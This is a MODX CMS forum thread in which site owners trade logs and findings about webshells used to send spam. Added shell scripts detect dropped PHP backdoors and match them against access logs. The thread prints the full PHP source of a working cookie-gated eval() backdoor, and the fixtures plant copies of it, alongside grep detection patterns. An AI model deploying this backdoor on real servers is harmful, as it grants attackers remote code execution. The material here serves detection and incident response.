    • 33186
    • 17 Posts
    Hello,

    Today I noticed that some .js files on some sites running the latest MODX Evolution 1.0.14 are infected with the script (see attachment).

    My question is: how could this happen, and how can I prevent it?

    • It's possible your site still has files from previous MODX installs, and one of those files was used to exploit the site. You should check your log files around the time that file was created.
        Patrick | Server Wrangler | MODX Hosting
        • 28173
        • 409 Posts
        Similar hack on 4 websites under Evo 1.0.14.

        In the Postfix queue, I have this:
        0B11416431      784 Sat Sep 13 23:09:13  [email protected]
        (delivery temporarily suspended: lost connection with mta7.am0.yahoodns.net[98.138.112.37] while sending RCPT TO)
                                                 [email protected]
        
        05DC71640D      791 Sat Sep 13 23:09:13  [email protected]
        (delivery temporarily suspended: lost connection with mta7.am0.yahoodns.net[98.138.112.37] while sending RCPT TO)
                                                 [email protected]
        
        8B30F16405      784 Sat Sep 13 23:09:12  [email protected]
        (delivery temporarily suspended: lost connection with mta7.am0.yahoodns.net[98.138.112.37] while sending RCPT TO)
                                                 [email protected]
        
        9CB9C16409      791 Sat Sep 13 23:09:12  [email protected]
        (delivery temporarily suspended: lost connection with mta7.am0.yahoodns.net[98.138.112.37] while sending RCPT TO)
                                                 [email protected]
        
        7EEB6162FD      798 Sat Sep 13 23:09:12  [email protected]
        (delivery temporarily suspended: lost connection with mta7.am0.yahoodns.net[98.138.112.37] while sending RCPT TO)
                                                 [email protected]
        


        In the Apache log of this domain, I found this:
        77.232.92.131 - - [13/Sep/2014:23:03:36 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 7526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:03:48 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 4048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:03:57 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 7880 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:04:08 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 6922 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:04:16 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 7883 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:04:24 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 9027 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:04:31 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 7409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"


        You can see the blog.php file as attachment.

        I have deleted it to stop the spam attack.

        • I had the same hack essentially, except there was a file called gallery.php under manager/mcpuk/themes, if I remember correctly.

          Not sure how to stop it again. I will have to persuade the client to move to Revo, I suppose.
            • 28173
            • 409 Posts
            Yes, the name and the directory of the file change...

            Today, I had a new case a little bit different.
            The PHP file was not encrypted and the content was:
            <?php
            if (!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'], 0, 16) == '3469825000034634') {
                if (!empty($_POST['message']) and $message = @gzinflate(@base64_decode(@str_replace(' ', '', urldecode($_POST['message']))))) {
                    echo '<textarea id=areatext>'; eval($message); echo '</textarea>bg'; exit;
                }
            }
            exit;

            Maybe a clue about the attack...
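Patrick's advice earlier in the thread (check the logs around the time the file was created), the blog.php access-log entries and the cookie-gated eval() shell posted just above suggest two quick checks to run on a suspected MODX Evolution tree. The following is an added example, not code from this thread or from MODX: it builds a constructed fixture (paths modelled on the ones reported here, contents and timestamps invented) and then (1) lists PHP files under assets/ and manager/media/ that contain eval()/assert() or the decoders a webshell typically feeds into them, and (2) lists PHP files modified after a reference date, which on a site nobody has edited since install flags anything dropped later.

```shell
#!/bin/sh
# Added example (not from the thread): hunt for dropped PHP webshells in a MODX Evolution tree.
# Two checks: (1) PHP files under asset/media directories that call eval()/assert() or the
# decoders webshells typically use; (2) PHP files modified after a reference date.

# Build a constructed fixture: one benign snippet config and two planted shells whose
# paths follow the ones reported in the thread. Prints the fixture root.
make_fixture() {
  fx_root=$(mktemp -d)
  mkdir -p "$fx_root/assets/snippets/maxigallery/watermark" \
           "$fx_root/manager/media/ImageEditor/assets" \
           "$fx_root/assets/galleries/61"
  # Benign: a plain settings file with no dynamic code execution.
  cat > "$fx_root/assets/snippets/maxigallery/watermark/settings.php" <<'EOF'
<?php
$watermark_opacity = 50;
$watermark_position = 'bottom-right';
EOF
  # Planted: cookie-gated eval of a base64+deflate POST body, as posted in the thread.
  cat > "$fx_root/manager/media/ImageEditor/assets/blog.php" <<'EOF'
<?php
if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;
EOF
  # Planted: the decoder name is split to dodge a naive grep for base64_decode.
  cat > "$fx_root/assets/galleries/61/gallery.php" <<'EOF'
<?php $f = 'ba' . 'se64_decode'; $c = 'ZXZhbCgkX1BPU1RbJ2MnXSk7'; eval($f($c));
EOF
  # Timestamps (invented): the config dates from the install, the shells from September.
  touch -t 201406011200.00 "$fx_root/assets/snippets/maxigallery/watermark/settings.php"
  touch -t 201409122210.00 "$fx_root/assets/galleries/61/gallery.php"
  touch -t 201409132303.30 "$fx_root/manager/media/ImageEditor/assets/blog.php"
  printf '%s\n' "$fx_root"
}

# Check 1: PHP under directories that should only hold assets/uploads, containing
# code-execution sinks or decoders. eval() alone is enough to flag, so a split
# 'ba'.'se64_decode' string does not escape the match.
find_suspicious_php() {
  find "$1/assets" "$1/manager/media" -type f -name '*.php' |
    while IFS= read -r f; do
      if grep -Eq 'eval[[:space:]]*\(|assert[[:space:]]*\(|gzinflate|base64_decode|str_rot13' "$f"; then
        printf '%s\n' "${f#"$1"/}"
      fi
    done | sort
}

# Check 2: PHP files modified after a reference time ($2 in YYYYMMDDhhmm, as for touch -t).
# On a site nobody has edited since installation, anything listed here needs an explanation.
php_modified_since() {
  ref=$(mktemp)
  touch -t "$2" "$ref"
  find "$1" -type f -name '*.php' -newer "$ref" |
    while IFS= read -r f; do printf '%s\n' "${f#"$1"/}"; done | sort
  rm -f "$ref"
}

# Stand-alone demo on the constructed fixture.
demo_root=$(make_fixture)
echo "Suspicious PHP:"; find_suspicious_php "$demo_root"
echo "PHP modified since 2014-09-01:"; php_modified_since "$demo_root" 201409010000
rm -rf "$demo_root"
```

Run it against a real site root instead of the fixture by calling the two functions with the document root and the install date; a match in check 1 is a file to read by hand, not proof by itself, since some legitimate extras also call base64_decode. The mtime check is only as good as the timestamps: an attacker who touches the file back to the install date defeats it, which is why the log correlation in the replies that follow matters.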
            • The logs don't show the attack vector; they only show the use of one installed PHP script.

              If you want to help us find the attack vector, you should look at when the installed file was created and mail the Apache log entries around that time by forum PM to me or to [email protected].
                • 28173
                • 409 Posts
                OK, I will next time (probably in a few days...)
                  • 18389
                  • 169 Posts
                  I have the same as the original post.

                  The files that my host found were:
                  assets/snippets/maxigallery/imagemask/include.php (file last modified 8/7/14)
                  assets/snippets/maxigallery/watermark/config.php (file last modified 8/7/14)
                  assets/galleries/61/gallery.php (file last modified 9/12/14)

                  I am on Evo 1.0.14

                  In my host's error logs I found a "backdoor.list" that contained:

                  siteroot/assets/images/ce2ea3430.php
                  siteroot/assets/site/h5n8k1.php


                  I would also like to note that the snippet "ajax search" was not involved, as I delete that snippet from the manager and the related folders and files via FTP when I initially install Evo 1.0.14, as a habit now, due to previous vulnerabilities.
                    www.markojokic.com
                    • 48536
                    • 5 Posts
                    As far as I can see, this is becoming a serious issue, which was reported a month ago.

                    http://forums.modx.com/thread/92600/malicious-files-detected-on-my-server-account

                    Can somebody find in their access logs where the files come from (compare the dates of the files with the logs)?

                    Because of the delay between the hack and the start of the spam (a few weeks), I can't find it in our logs.
                    • Hi there,

                      Some of my sites got hacked, too. The malicious files on the server look similar to yours. Spamming started some days ago, but the bad files have a timestamp of January 25th, 2011.

                      By now, I've had 3 or 4 hacked sites. Some Revo, some Evo. The Revo hack was noticed by a hoster's IDS (intrusion detection system), so we could react quickly.

                      What I learned from the server logs (Revo 2.2.13) was the time and target of the attack:
                      5.61.42.211,-,-,[06/Jun/2014:13:18:26 +0200],"GET /assets/xPDO.idx.php HTTP/1.1",404,0,Germany,-,Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
                      5.61.42.211,-,-,[06/Jun/2014:13:18:33 +0200],"GET /assets/xPDO.idx.php HTTP/1.1",200,647,Germany,-,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
                      5.61.42.211,-,-,[06/Jun/2014:13:18:38 +0200],"POST /assets/xPDO.idx.php HTTP/1.1",200,18803,Germany,http://***/assets/xPDO.idx.php,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
                      5.61.42.211,-,-,[06/Jun/2014:13:18:40 +0200],"POST /assets/xPDO.idx.php HTTP/1.1",200,13304,Germany,http://***/assets/xPDO.idx.php,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
                      5.61.42.211,-,-,[06/Jun/2014:13:18:42 +0200],"POST /assets/xPDO.idx.php HTTP/1.1",200,15667,Germany,http://***/assets/xPDO.idx.php,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
                      5.61.42.211,-,-,[06/Jun/2014:13:18:43 +0200],"POST /assets/xPDO.idx.php HTTP/1.1",200,16281,Germany,http://***/assets/xPDO.idx.php,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
                      5.61.42.211,-,-,[06/Jun/2014:13:18:49 +0200],"POST /assets/xPDO.idx.php HTTP/1.1",200,16774,Germany,http://***/assets/xPDO.idx.php,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0

                      5.61.42.211 is the attacking server. I can be sure of that for two reasons:
                      1) I wasn't able to find out who it belongs to. The domain is separated from the IP, the IP is separated from the hoster, etc. No chance of getting that guy. There was a German domain connected to that IP and I tried to contact the owner at the given contact data, without success.
                      2) This IP is hosting domains which are used to offer pills. The attacker installed a plugin on my server to redirect users to this server.

                      I also learned that at 13:18:26 the GET request for /assets/xPDO.idx.php resulted in a 404: not there. And the attacker claimed to be a Google bot, this time. Seven seconds later, the file was present.

                      I called a friend and he was able to find the files, copy them and run them on his box. See attachment "webshell1".

                      Some weeks later, other sites were hacked and my own server sent out spam again. This time it was one Revo and one Evo site. Different webshells were uploaded this time: /assets/plugins/qm/css/list.php, for instance, or /core/packages/core/modUserGroup/code.php.

                      Today I checked my server again and one of the sites was spamming again.
                       mailq | egrep '^--'
                      told me that there were 50,000 emails queued to be sent out.
                      postsuper -d ALL 
                      deleted the queue. But when I checked after some time (~30 seconds), there were about 12 mails again. So I searched for the bad files again and ran into a lot of them, including list.php.

                      I renamed list.php to __list.php and the mails stopped immediately. So my next step is to check the database for hidden users (with no username; I had that once!), wipe the server and install MODX from scratch.

                      If you have a server with many sites on it, you will have trouble finding out where to look.
                      You can delete the whole mail queue and open fresh mails. They may contain a user ID of the server's user. That might lead you to the correct website on your server. The email will contain the user's ID in the header. With
                      cat /etc/passwd | grep <ID goes here>
                      you can find out the username.

                      If you are interested in the actual attack, I can offer a part of the server log. It contains over 900 requests, 225 GET and the rest POST. I can't make it public as it might be traced back to the client's site.

                      I am hopeful that we can put an end to those attacks. At least we can develop stuff to trace the attacker, or at least prevent damage to the site and performance.

                      Cheers,

                      Guido
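Two replies in this thread ask for the Apache log entries around the time a dropped file was created, and Guido's log shows why that works: a GET for /assets/xPDO.idx.php returned 404, and seven seconds later the same path returned 200, so the file appeared in between. The following is an added example, not code from this thread or from MODX, that does both steps with awk on a constructed sample log: it prints the entries within a window around a file's mtime, and prints the status history of one path so a 404 followed by 200 stands out. It assumes Apache combined log format (Guido's host writes a comma-separated variant, for which the field numbers would differ) and takes the reference time in the log's own dd/Mon/yyyy:HH:MM:SS form, copied from ls -l --full-time or stat on the suspicious file.

```shell
#!/bin/sh
# Added example (not from the thread): pull the access-log entries around a suspicious file's
# modification time, and show a path's status history so a 404 followed by 200 stands out.
# Expects Apache combined log format ($4 = [dd/Mon/yyyy:HH:MM:SS, $7 = path, $9 = status).

# Constructed sample log: documentation-range IPs, invented times; the path is the one
# reported in this thread. Prints the temp file name.
make_sample_log() {
  smp=$(mktemp)
  cat > "$smp" <<'EOF'
203.0.113.7 - - [13/Sep/2014:22:58:01 +0200] "GET /index.php?id=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Sep/2014:23:03:20 +0200] "GET /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 404 221 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.7 - - [13/Sep/2014:23:03:27 +0200] "GET /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 647 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Sep/2014:23:03:36 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 7526 "-" "Mozilla/5.0"
198.51.100.9 - - [13/Sep/2014:23:40:00 +0200] "GET /assets/images/logo.png HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
EOF
  printf '%s\n' "$smp"
}

# Print the log lines within +/- $3 seconds of reference time $2 (dd/Mon/yyyy:HH:MM:SS,
# i.e. the file's mtime written in the log's own format).
# The zone is ignored: all entries in one log share it, so only the delta matters.
log_window() {
  awk -v ref="$2" -v win="$3" '
    # Seconds since the epoch for dd/Mon/yyyy:HH:MM:SS (days-from-civil algorithm).
    function epoch(ts,    a, m, y, d, era, yoe, doy, doe) {
      split(ts, a, "[/:]")
      m = (index("JanFebMarAprMayJunJulAugSepOctNovDec", a[2]) + 2) / 3
      d = a[1] + 0; y = a[3] + 0
      if (m <= 2) y--
      era = int(y / 400)
      yoe = y - era * 400
      doy = int((153 * (m > 2 ? m - 3 : m + 9) + 2) / 5) + d - 1
      doe = yoe * 365 + int(yoe / 4) - int(yoe / 100) + doy
      return (era * 146097 + doe - 719468) * 86400 + a[4] * 3600 + a[5] * 60 + a[6]
    }
    BEGIN { r = epoch(ref) }
    { t = epoch(substr($4, 2)); delta = t - r; if (delta < 0) delta = -delta
      if (delta <= win) print }
  ' "$1"
}

# Print the sequence of status codes for one request path, in log order.
# "404 200 ..." means the file did not exist and then did: it was created in between.
status_sequence() {
  awk -v p="$2" '$7 == p { seq = (seq == "" ? $9 : seq " " $9) } END { print seq }' "$1"
}

# Stand-alone demo: pretend blog.php was found with mtime 13/Sep/2014 23:03:25.
demo_log=$(make_sample_log)
echo "Requests within 60s of the file mtime:"; log_window "$demo_log" 13/Sep/2014:23:03:25 60
echo "Status history of blog.php:"; status_sequence "$demo_log" /manager/media/ImageEditor/assets/blog.php
rm -f "$demo_log"
```

The request that lands just before the mtime in the window output is the one that wrote the file, and its path is the vulnerable component to look at; the status history then confirms it. Widen the window if the file's mtime is unreliable, and remember that rotated logs must be searched too when, as in this thread, the spam starts weeks after the upload.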